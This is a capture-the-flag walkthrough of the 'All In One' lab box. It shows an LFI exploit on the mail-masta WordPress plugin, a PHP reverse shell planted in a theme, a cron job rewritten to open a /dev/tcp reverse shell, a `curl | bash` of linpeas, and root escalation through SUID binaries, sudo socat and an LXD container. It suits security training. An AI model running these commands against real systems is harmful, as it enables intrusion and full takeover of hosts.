# All In One Write-Up

## Enumeration

### RustScan

```
rustscan -b 500 -a 10.10.130.232

Output:
f4h3d@Cyber:~/ctf/thm/AllInOne$ rustscan -b 500 -a 10.10.130.232
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/f4h3d/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 924'.
Open 10.10.130.232:21
Open 10.10.130.232:22
Open 10.10.130.232:80

```

> rustscan is a very fast port scanner. \
> GitHub page: [RustScan](https://github.com/RustScan/RustScan)

### Nmap Scan

```
sudo nmap -A -p 21,22,80 10.10.130.232 -oN nmap-scan 

Output:
f4h3d@Cyber:~/ctf/thm/AllInOne$ sudo nmap -A -p 21,22,80 10.10.130.232 -oN nmap-scan
[sudo] password for f4h3d: 
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-16 03:00 +03
Nmap scan report for 10.10.130.232
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.161.67
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   124.24 ms 10.8.0.1
2   124.30 ms 10.10.130.232

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.92 seconds
```

> -A is shorthand for -sC -sV -O --traceroute (default scripts, version detection, OS detection and traceroute)
>
> -oN saves the output to a file in normal format

#### FTP Enumeration

The nmap scan showed that anonymous login is enabled, so we connect to the FTP service and check what files are there.

```
ftp 10.10.130.232

f4h3d@Cyber:~/ctf/thm/AllInOne$ ftp 10.10.130.232
Connected to 10.10.130.232.
220 (vsFTPd 3.0.3)
Name (10.10.130.232:f4h3d): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 06  2020 .
drwxr-xr-x    2 0        115          4096 Oct 06  2020 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 06  2020 .
drwxr-xr-x    2 0        115          4096 Oct 06  2020 ..
226 Directory send OK.
```

> The anonymous FTP directory is empty, so there is nothing sensitive to take from this service.

### HTTP Enumeration

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfpLT49xta4dykae4-%2F-Mjfvrkd0BTILjPBSWxg%2Fhttp.png?alt=media\&token=997feceb-806d-4abf-8780-c1111167cc1a)

The default Apache2 page. \
We start enumerating paths with gobuster, or any other tool you prefer.

```
gobuster -u http://10.10.130.232 -w /usr/share/DirBuster/directory-list-2.3-medium.txt -k -x php,txt -t 25

Output:

f4h3d@Cyber:~/ctf/thm/AllInOne$ gobuster -u http://10.10.130.232 -w /usr/share/DirBuster/directory-list-2.3-medium.txt -k -x php,txt -t 25 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.130.232/
[+] Threads      : 25
[+] Wordlist     : /usr/share/DirBuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,txt
[+] Timeout      : 10s
=====================================================
2021/09/16 03:26:27 Starting gobuster
=====================================================
/wordpress (Status: 301)
/hackathons (Status: 200)

```

> -u sets the target URL \
> -w sets the wordlist path \
> -k skips SSL certificate verification (not needed for plain http, but harmless here) \
> -x adds file extensions to try \
> -t sets the number of threads, i.e. the brute-force speed

We found two paths, so we check them one by one.

![The page is empty, so we look at the page source](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-Mjg00nfb2vobbI_ahqW%2FHackathon.png?alt=media\&token=a284b279-a55b-4778-bf2a-bf8fb1470cc8)

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-MjghSwEQml1VVcxRjG2%2FScreenshot%20from%202021-09-16%2006-44-34.png?alt=media\&token=67920f78-7db7-4c55-99c3-22f4b3d310fb)

#### At the end of the source code we found encoded text, and the hint was Vinegar == Vigenère cipher

#### We use [CyberChef](https://gchq.github.io/CyberChef/) to decrypt it

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-Mjgi_Ad9DxIIdxvN_3V%2FScreenshot_2.png?alt=media\&token=0d9ca7d9-7697-48a8-9d30-78319631827b)

> Here we got a password, so we save it in case we need it later: H\@ckme\@123
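As an added example (not part of the original write-up), this is the Vigenère decryption CyberChef performs, in Python. Only ASCII letters are shifted; symbols and digits such as `@` and `123` pass through unchanged and do not advance the key, which is why a recovered password like `H@ckme@123` keeps its non-letter characters. The ciphertext and key in the block are constructed test vectors; the real ciphertext and key from the hackathons page are only visible in the screenshot above.

```python
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase


def _shift(ch, key_letter, sign):
    """Shift one character by key_letter (sign=+1 encrypt, -1 decrypt).

    Returns (new_char, consumed): non-letters are returned untouched and do
    not consume a key position, matching CyberChef's Vigenère behaviour.
    """
    if not (ch.isascii() and ch.isalpha()):
        return ch, False
    alphabet = UPPER if ch.isupper() else LOWER
    idx = (alphabet.index(ch) + sign * UPPER.index(key_letter.upper())) % 26
    return alphabet[idx], True


def vigenere(text, key, decrypt=False):
    """Vigenère over A-Z/a-z with a key that repeats across letters only."""
    key = "".join(c for c in key if c.isascii() and c.isalpha())
    if not key:
        raise ValueError("key must contain at least one letter")
    out, pos = [], 0
    for ch in text:
        new, consumed = _shift(ch, key[pos % len(key)], -1 if decrypt else 1)
        out.append(new)
        if consumed:
            pos += 1
    return "".join(out)


def vigenere_decrypt(ciphertext, key):
    return vigenere(ciphertext, key, decrypt=True)


def vigenere_encrypt(plaintext, key):
    return vigenere(plaintext, key)


if __name__ == "__main__":
    # Constructed sample (classic test vector), not the text from the target page
    print(vigenere_decrypt("lxfopv ef rnhr", "lemon"))
```

If you do not know the key, the usual route is to guess its length from repeated trigrams (Kasiski) and then solve each key position as a Caesar shift by letter frequency; CyberChef's "Vigenère Decode" needs the key supplied, which on this box came from the page's hint.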

![The wordpress path is an ordinary WordPress site](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-Mjg0VffmAGmFblIkj7k%2FWordpress.png?alt=media\&token=fb41933c-91ea-4e0b-a49b-7d16a3b1a0a2)

> **From the screenshot we can identify one of the WordPress users: elyana**

#### wpscan

> wpscan: one of the most important tools for assessing sites that run WordPress

```
wpscan --url http://10.10.130.232/wordpress

Output:

f4h3d@Cyber:~/ctf/thm/AllInOne$ wpscan --url http://10.10.130.232/wordpress
-->[snip]<--

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://10.10.130.232/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2021-03-10T02:38:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.130.232/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <=====================> (137 / 137) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register


```

> The tool reported two plugins with their versions, so we research both: \
> mail-masta 1.0 \
> reflex-gallery 3.1.7

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-Mjg7v5MeR87HUWOUBfG%2FMail-masta.png?alt=media\&token=07881aa8-eef5-4486-9043-a3d4a610b941)

> The mail-masta plugin has two known vulnerabilities: LFI and SQL injection. \
> We start with the first one; the exploit is [here](https://www.exploit-db.com/exploits/40290)

```
curl http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
```

> This confirms the plugin is vulnerable to LFI, so we try to read wp-config.php, since that file almost always holds the database username and password. \
> Because it is a PHP file, a plain include would execute it rather than show it, so we read it through the php://filter base64 wrapper and decode the result locally.

```
curl http://10.10.130.232/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php | base64 -d 

Output:
-->[snip]<--

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', 'H@ckme@123' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

-->[snip]<--

```

> Here we recovered the username and password (the same password the Vigenère hint gave us): \
> elyana : H\@ckme\@123

#### We try to log into the machine over SSH with these credentials

```
ssh elyana@10.10.130.232

Output:
f4h3d@Cyber:~/ctf/thm/AllInOne$ ssh elyana@10.10.130.232
The authenticity of host '10.10.130.232 (10.10.130.232)' can't be established.
ECDSA key fingerprint is SHA256:IVzQLYHc196APvwnH40vFHjOR4ZsfNqxHnOG3HuzXgg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.130.232' (ECDSA) to the list of known hosts.
elyana@10.10.130.232's password: 
Permission denied, please try again.
elyana@10.10.130.232's password: 
Permission denied, please try again.
elyana@10.10.130.232's password:

```

> SSH login failed and there is no exposed MySQL port, so the last place to try the credentials is the site's WordPress login page.

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-MjgCIbtQfU9aFyod9_w%2FLogin%20page.png?alt=media\&token=c5ff5b29-d8aa-41cd-a185-6ee72d5a194c)

![Here we logged into elyana's account](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-MjgCLxm9Z5nk1lVkNX8%2Femail%20verify.png?alt=media\&token=2d52000c-ada7-4d1f-9685-a44d9fa589f3)

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-MjgCUjoj1X-Rdcpg3mD%2Fadmin%20panel.png?alt=media\&token=765318ea-e2e2-4453-aba5-d4253c9180cd)

> We reached the admin panel; the next step is to get a shell on the machine.

## Getting a foothold

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjfwVUT85bkCXgv_g43%2F-MjgDJWWbbXZUaOvTTdS%2FScreenshot%20from%202021-09-16%2004-29-14.png?alt=media\&token=534c001b-c6ed-4d41-a172-0487ac76288a)

> Here we can edit one of the theme files, so we use the [pentestmonkey reverse shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) \
> and change the IP and port inside the shell

![](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgDm4fQ8KiUZP-L_Q3%2F-MjgEoE7V3KuilY1FDPA%2FScreenshot_8.png?alt=media\&token=ac78d2c6-aff2-4b56-aa46-893bd5a2c42b)

> Double-check the IP and port, then save the file with Update File

```
nc -lnvp 9111 # listener waiting for the connection from the shell

curl http://10.10.130.232/wordpress/wp-content/themes/twentytwenty/404.php
# request the page we put the shell into
```

![Reverse Shell #Done ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgDm4fQ8KiUZP-L_Q3%2F-MjgFsQ0Bcf3c3hOrLLV%2FScreenshot%20from%202021-09-16%2004-40-13.png?alt=media\&token=a9f937e3-f5ff-450c-80df-8c7feb5b585c)

> After getting a session on the machine we upgrade the shell to a fully interactive one

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
^Z # background the shell
stty raw -echo ; fg
# this brings us back to the shell
export TERM=xterm

# the shell is now upgraded
```

### Privilege Escalation

#### This machine has more than one way to escalate privileges, so we will go through all of them

```
sudo python3 -m http.server 80 # serve files over HTTP from our machine

curl http://10.8.161.67/linpeas.sh | bash

# download linpeas and run it on the target
```

### PrivEsc 1 : crontab

```
linpeas output :

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

*  *    * * *   root    /var/backups/script.sh

bash-4.4$ ls -la /var/backups/script.sh
-rwxrwxrwx 1 root root 73 Oct  7  2020 /var/backups/script.sh
bash-4.4$ cat /var/backups/script.sh
#!/bin/bash

#Just a test script, might use it later to for a cron task 
bash-4.4$ cat /etc/crontab
-->[snip]<--

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /var/backups/script.sh

#We have write permissions so let's edit the file and start a new netcat listener
 
echo 'bash -c "bash -i >& /dev/tcp/10.8.161.67/9112 0>&1"' > /var/backups/script.sh

```

![Rooted Successfully](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-MjgQdEqamgt8y3XRpuk%2FScreenshot%20from%202021-09-16%2005-27-03.png?alt=media\&token=227809ea-4b36-487b-939c-3b3556120d4e)
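The check that linpeas performed above, a root cron job whose script is writable by everyone, as an added Python example (not the write-up's or linpeas's code). It parses system-crontab lines, keeps the jobs that run as root and start with an absolute path, and classifies each target as world-writable, writable by the current user, or missing from a directory we can write to (in which case we can create it). demo() builds a constructed crontab and a 0777 temp script to reproduce the box offline.

```python
import os
import re
import stat
import tempfile

# Five schedule fields, a user, then the command (system crontab format, as in /etc/crontab)
CRON_JOB = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def parse_system_crontab(text):
    """Return (schedule, user, command) per job line; skips comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_JOB.match(line)
        if m:
            jobs.append((" ".join(m.groups()[:5]), m.group(6), m.group(7)))
    return jobs


def classify_target(path):
    """World-writable beats user-writable; a missing script only matters if its directory is writable."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return "missing" if os.access(os.path.dirname(path), os.W_OK) else None
    if mode & stat.S_IWOTH:
        return "world-writable"
    if os.access(path, os.W_OK):
        return "writable-by-current-user"
    return None


def writable_root_jobs(crontab_text):
    """Root jobs whose first word is an absolute path we could modify or create."""
    findings = []
    for _schedule, user, command in parse_system_crontab(crontab_text):
        target = command.split()[0]
        if user != "root" or not target.startswith("/"):
            continue  # 'cd / && run-parts ...' style lines are not a single script we can swap
        reason = classify_target(target)
        if reason:
            findings.append((target, reason))
    return findings


def demo():
    """Constructed crontab + temp files mirroring the box: a 0777 root script run every minute."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "script.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(script, 0o777)
        crontab = f"""SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   root    {script}
*  *    * * *   root    {os.path.join(d, 'missing.sh')}
*  *    * * *   nobody  {script}
"""
        return [(os.path.basename(p), why) for p, why in writable_root_jobs(crontab)]


if __name__ == "__main__":
    for path, why in demo():
        print(f"{why}: {path}")
```

On the target, `writable_root_jobs(open("/etc/crontab").read())` would flag `/var/backups/script.sh` as world-writable; the same parser can be pointed at the files under `/etc/cron.d/`, which use the same user-field format.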

### PrivEsc 2 : SUID

```
linpeas.sh output : 

════════════════════════════════════╣ Interesting Files ╠════════════════════════════════════
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-sr-x 1 root root 1.1M Jun  6  2019 /bin/bash
-rwsr-sr-x 1 root root 59K Jan 18  2018 /bin/chmod
-rwsr-xr-x 1 root root 99K Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-sr-x 1 root root 11M Nov 23  2018 /usr/bin/lxc (Unknown SUID binary)
-rwsr-sr-x 1 root root 392K Apr  4  2018 /usr/bin/socat
#Default SUID binaries snipped !

```

> [GTFOBins](https://gtfobins.github.io/) is very useful whenever we find a binary with misconfigured permissions that can be used for privilege escalation

#### Bash SUID

![Rooted by bash binary ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-MjgTp5fvibazaxO--aB%2FScreenshot_1.png?alt=media\&token=a8760e82-eaae-459c-8c9f-ff7ded75c09a)

#### Chmod SUID

> chmod by itself does not give us a shell, but with the SUID bit it runs as root, so we can change the permissions of files such as /etc/shadow, or set the SUID bit on /bin/bash and get root that way.

### PrivEsc 3 : Escalate our privileges to elyana

```
cd /home/elyana 
ls -la 
drwxr-xr-x 6 elyana elyana 4096 Oct  7  2020 .
drwxr-xr-x 3 root   root   4096 Oct  5  2020 ..
-rw------- 1 elyana elyana 1632 Oct  7  2020 .bash_history
-rw-r--r-- 1 elyana elyana  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 elyana elyana 3771 Apr  4  2018 .bashrc
drwx------ 2 elyana elyana 4096 Oct  5  2020 .cache
drwxr-x--- 3 root   root   4096 Oct  5  2020 .config
drwx------ 3 elyana elyana 4096 Oct  5  2020 .gnupg
drwxrwxr-x 3 elyana elyana 4096 Oct  5  2020 .local
-rw-r--r-- 1 elyana elyana  807 Apr  4  2018 .profile
-rw-r--r-- 1 elyana elyana    0 Oct  5  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 elyana elyana   59 Oct  6  2020 hint.txt
-rw------- 1 elyana elyana   61 Oct  6  2020 user.txt
# we got a hint and user.txt file 

bash-4.4$ cat hint.txt 
Elyana's user password is hidden in the system. Find it ;)


bash-4.4$ find / -user elyana 2>/dev/null
/home/elyana
/home/elyana/.local
/home/elyana/.local/share
/home/elyana/.cache
/home/elyana/user.txt
/home/elyana/.gnupg
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt

bash-4.4$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght

# SSH credentials
```

> The hint says the password is hidden somewhere in the system, so we used find with -user elyana to list the files she owns. \
> That turned up a file containing the username and password; we try SSH with those credentials.

![Here we reached the user elyana](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-Mjg_h5CSO8Z0xYjRJoS%2FScreenshot%20from%202021-09-16%2006-11-25.png?alt=media\&token=9ce0b055-85bf-45bb-97ca-e8122ea66f48)

### PrivEsc 4 : from elyana to root

The first thing to do, now that we have the password, is sudo -l to check whether we are allowed to run any tool as root.

```
-bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat

```

> We can run socat as root. \
> socat is a tool similar to netcat, so we go back to [GTFOBins](https://gtfobins.github.io/)

```
-bash-4.4$ sudo socat stdin exec:/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

```

### PrivEsc 5 : from elyana to root #2

```
-bash-4.4$ id
uid=1000(elyana) gid=1000(elyana) groups=1000(elyana),4(adm),27(sudo),108(lxd)

# elyana is a member of the lxd group
```

> We start the last escalation method: as we saw, elyana is a member of the lxd group, so we try to escalate through it. \
> [LXD PrivEsc](https://www.hackingarticles.in/lxd-privilege-escalation/) is the site I rely on whenever I run into this technique, so we follow it step by step.

```
# on the attacking machine: build a minimal Alpine image
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine

f4h3d@Cyber:~/tools/lxd-alpine-builder$ ls
alpine-v3.14-x86_64-20210916_0624.tar.gz  build-alpine  LICENSE  README.md

# move the new .tar.gz to your working directory, for example:
mv alpine-v3.14-x86_64-20210916_0624.tar.gz ~/ctf/thm/AllInOne

# now serve it over HTTP with python
sudo python3 -m http.server 80

# switch to elyana's session on the target

-bash-4.4$ cd /tmp
-bash-4.4$ wget http://10.8.161.67/alpine-v3.14-x86_64-20210916_0624.tar.gz

# the image is downloaded and saved

# step 1: import the image
lxc image import ./alpine-v3.14-x86_64-20210916_0624.tar.gz --alias myimage
# step 2: confirm it is listed
lxc image list
# step 3: create a privileged container
lxc init myimage ignite -c security.privileged=true
# step 4: mount the host root filesystem at /mnt/root inside the container
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
# step 5: start it
lxc start ignite
# step 6: get a shell inside the container; the host's / is under /mnt/root
lxc exec ignite /bin/sh
```

![Rooted via lxd technique ](https://3061301687-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjfpG5FuSH7q1_Jh3W3%2F-MjgHdvq6AnC48K289bR%2F-MjgfAx8zDhklp-mYEgR%2FScreenshot%20from%202021-09-16%2006-35-23.png?alt=media\&token=84033ee7-42fb-45a8-a4a6-ef8f7ba70a99)

```
cat /mnt/root/root/root.txt ; cat /mnt/root/home/elyana/user.txt 
# both flags, read through the mounted host filesystem
```
